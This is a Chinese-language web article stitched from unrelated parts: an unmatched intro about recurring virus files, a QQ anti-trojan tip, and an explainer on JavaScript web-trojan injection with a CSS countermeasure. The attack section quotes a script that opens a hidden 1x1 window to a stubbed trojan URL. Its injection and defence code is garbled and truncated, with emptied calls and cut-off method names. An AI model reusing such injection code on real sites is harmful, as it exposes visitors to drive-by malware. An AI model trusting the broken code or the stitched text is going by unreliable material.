最近不少使用者發現病毒檔案反覆生成出現問題,不知道該怎麼辦,強行關機等都沒有辦法有效的解決這個問題,小編給大家推薦一下解決這個問題的方法。
在《電腦報》上看了不少高手教授的QQ防盜技巧,心癢不止,也冒昧來此獻醜!一些高手說的錯位法輸入密碼雖然具有防盜作用,但理論上黑客可以用窮舉法破解出密碼,所以這種方法不保險。
QQ防盜的根本所在我認為是判斷出電腦中是否有偷號木馬,沒有木馬我們怎麼輸入密碼都安全;如果有,再巧的密碼輸入法都不保險。那麼如何既準確又快捷地判斷出電腦中有無QQ木馬呢?
我用的方法是在QQ登入介面的密碼處,點選滑鼠右鍵。如果電腦中沒有木馬,點選滑鼠右鍵後沒有任何反應;如果電腦中有木馬,點選滑鼠右鍵就會彈出右鍵選單。因為很早QQ就不允許在密碼框中直接用“Ctrl+C”、 “Ctrl+V”輸入密碼了,如果這種輸入方式行得通,則表示有木馬破壞了QQ的規則。
瞭解JS掛馬方式
IFRAME掛馬方式比較早,相應的預防措施也比較多,其中用CSS配合JS指令碼進行預防是主流方式。可這種預防方式也存在安全隱患,JS指令碼也可以被用來掛馬,令人防不勝防。
CSS掛馬
許多人認為,只要自己的服務器安全做得足夠好,建站程式補丁打得勤快,就能夠抵禦住所有黑客的攻擊。這樣做的人肯定是非常多的,可為什麼還是有許多網站被黑呢?
一個很重要的原因,就是他們過於相信從第三方網站中下載的整站程式,或者修改版的論壇程式等,而這些程式有些已經被黑客做過手腳,已經植入了後門,此時如果網站站長不熟悉如何查補漏洞,將無異於引狼入室。
比較典型的一個例子是,曾經非常出名的《易想多使用者商城 v2.1》(仿淘寶版),被許多黑客竄改過,多個關鍵頁面被植入了後門,然後到處提供下載,導致了許多使用該程式的網站被攻擊。因此在隱蔽手段掛馬橫行的今天,熟悉並掌握隱蔽的掛馬方式,是一個安全工程師必備的技能。
JS掛馬溯源
古人云:人算不如天算,天算不如暗算(小編:哪個古人這樣雲過?)。當IFRAME逐漸被黑客濫用的時候,有經驗的安全工程師也開始研究相應的'對策,一段時間內各種阻止IFRAME掛馬的方法不斷湧現,其中通用性較高的就是利用CSS配合JS指令碼防禦IFRAME掛馬。
而黑客也發現,很多網站都會讓網頁呼叫JS指令碼來實現廣告等諸多特效,如果將木馬掛在JS指令碼中,所有呼叫該JS指令碼的網頁都等同於被掛上了木馬,對於需要肉雞群的黑客而言是一勞永逸,因此JS指令碼掛馬逐漸開始被黑客應用。
小百科:JS指令碼是JavaScript指令碼語言的簡稱,它是一種面向物件的指令碼語言,目前廣泛用於動態網頁的程式設計。需要提示大家的是,JavaScript和Java除了語法上有一些相似之處,以及都能夠當作網頁的程式語言以外,兩者是完全不相干的。而JavaScript與Jscript也不同,Jscript是微軟為了迎戰JavaScript推出的指令碼語言。
雖然JavaScript作為給非程式人員的指令碼語言向大眾推廣,但是JavaScript是一門具有豐富特性的語言,它有著和其他程式語言一樣的複雜性。實際上,你必須對JS有紮實的理解才能用它來編寫比較複雜的程式,作為一名安全工程師,掌握JS指令碼在工作中會有很大的幫助。
掛馬原理一點通
JS指令碼掛馬對於黑客而言,可以說優點多得數不過來,首先JS指令碼在掛馬時可以直接將JS程式碼寫在網頁中,也可以通過注入網頁,讓網站遠端調取異地JS指令碼。此外,JS掛馬插入Web頁面的方法有幾十種,絕對夠菜鳥們眼花繚亂,無從辨別木馬在何處。
IFRAME掛馬相對於安全工程師而言,如同一個穿著鮮紅顏色外衣的劫匪,招搖而扎眼,很容易被發現。但是利用JS掛馬就意味著這個劫匪擁有了一張可以隨時變換的面孔,而且它還能夠隨時更換衣服。這樣的劫匪在安全工程師搜查時,很容易矇混過關,導致木馬久殺不絕。
JS掛馬攻防實錄
攻現在最多見的JS掛馬方法有兩種,一種是直接將JavaScript指令碼程式碼寫在網頁中,當訪問者在瀏覽網頁時,惡意的掛馬指令碼就會通過使用者的瀏覽器悄悄地開啟網馬視窗,隱藏地執行(圖1),這種方法使用的關鍵程式碼如下:
("http:///木","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
這種程式碼往往很長,很容易被安全工程師發現,而且沒有經驗的黑客也喜歡將“width”和“height=”引數設為“0”,但是設定為0後,可能會出現惡意程式碼不執行的情況。
另外一種JS掛馬方式是,黑客先將掛馬指令碼程式碼“e('')”,寫入Windows中的寫字板另存為字尾為的指令碼檔案,並上傳到自己指定的網址。這時黑客只需要在受害者的網站中寫入:
e("
")
e("")
e("
")
就成功地將木馬掛到了對方的網頁中了。
小提示:黑客還可以根據情況隨機變換插入的JS掛馬方法,例如黑客有可能會將指令碼寫為:
防第一種JS掛馬方式,不方便,用得非常少,而第二種JS掛馬方式才是當前主流的,所以我們主要針對它進行防禦。方法就是阻止Src請求的異地外域的JS指令碼,程式碼如下:
iframe{mdy1:expression(='about:blank',rHTML='');}
script{mzm2:expression((werCase()xOf('http')==0)?e('木馬被成功隔離!'):'');}
不過這種方法的缺點就是網站的訪問者將不能看到被掛了JS木馬的相關網頁(圖2)。
所以我們為安全工程師提供了一段可以中止JS指令碼執行的CSS程式碼,這段程式碼會讓異地外域的JS檔案在使用e()時,被e()強制關閉。這個時侯JS掛馬的內容往往還沒有來得及寫完,只有部分被強制輸出了,Writer後面的內容再不會被寫入訪問者的電腦中,從而起到防範JS指令碼掛馬的作用。
